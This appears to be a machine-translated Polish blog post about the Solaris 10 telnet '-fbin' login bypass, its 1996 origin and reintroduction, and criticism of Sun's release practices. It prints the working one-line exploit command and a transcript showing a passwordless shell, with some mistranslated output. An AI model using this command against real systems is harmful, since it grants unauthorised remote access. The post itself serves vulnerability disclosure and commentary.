211service.com
Stare błędy to najlepsze błędy
Przez weekend David Maynor opublikował notatkę w swoim Blog który twierdził, że tak zwany serwer Telnet w systemie operacyjnym Sun Solaris 10/11 nie wymaga żadnych umiejętności, żadnej wiedzy o exploitach i może być oskryptowany do masowych ataków.
Telnet to program z lat 70., który umożliwia zdalne logowanie się do komputera. Jest ogólnie wyłączony, ponieważ nazwy użytkowników i hasła są wysyłane bez użycia szyfrowania (co było wtedy nielegalne w przypadku eksportu ze Stanów Zjednoczonych). Ale chociaż program został w dużej mierze porzucony, Sun nadal dostarcza swoje systemy operacyjne Solaris 10 zarówno z serwerem Telnet, jak i programami klienckimi.
W każdym przypadku serwer Telnet pobiera nazwę użytkownika podaną przez osobę próbującą się zalogować i przekazuje te informacje do programu zwanego programem do logowania. Zadaniem programu do logowania jest poproszenie o podanie nazwy użytkownika i hasła. Zwykle to robi, a jeśli hasło jest poprawne, użytkownik może się zalogować.
Maynor odkrył, że atakujący może próbować zalogować się za pomocą nazwy użytkownika, takiej jak -fbin. Opcja -fbin jest przekazywana do programu logowania, który błędnie interpretuje -f jako polecenie z systemu operacyjnego, aby zalogować użytkownika na podane konto bez pytania o hasło. Exploit wygląda więc tak:
% telnet -l -fbin 192.168.1.110
Próbuję 192.168.1.110…
Połączony z 192.168.1.110.
Znak ucieczki to „^]”.
Ostatnie logowanie: niedziela 11 lutego 02:02:23 od 192.168.1.102
sun Microsystems Inc. SunOS 5.10 Ogólny styczeń 2005
$ identyfikator
uid = 2 (pojemnik) gid = 2 (pojemnik)
(Możesz przeczytać wszystkie krwawe szczegóły tutaj )
Naprawdę niesamowite jest to, że ta luka została po raz pierwszy opublikowana zgłoszone przez Zespół Reagowania na Awarie Komputerowe w 1996 roku. Najwyraźniej błąd został ponownie wprowadzony przez jakiegoś programistę niezaznajomionego z historią. Powiedziano mi, że został naprawiony w Solaris 11.
Więc co tu jest nie tak? Wiele rzeczy.
- Kiedy inżynierowie firmy Sun naprawili to w Solaris 11, powinni byli również naprawić to w Solaris 10.
- W tym momencie Sun nie powinien nawet dostarczać serwera Telnet.
- A jeśli zamierzają wysłać serwer, naprawdę powinni go zweryfikować. Chociaż nie mam możliwości dowiedzenia się, co wydarzyło się w Sun, domyślam się, że nie zawracali sobie głowy testowaniem serwera, ponieważ jest on domyślnie wyłączony.
Rozmawiając z konsultantem ds. bezpieczeństwa na targach RSA Security Trade Show w zeszłym tygodniu, powiedziano mi, że błędy bezpieczeństwa naprawione w serwerach produkcyjnych w systemach bankowych są często przywracane, gdy nowe wydania są dostarczane. To oczywiście dobra wiadomość dla konsultantów ds. bezpieczeństwa. Ale wyjaśnia to również, dlaczego przestępczość zorganizowana ma tak łatwy czas na szybkie zarabianie pieniędzy w Internecie.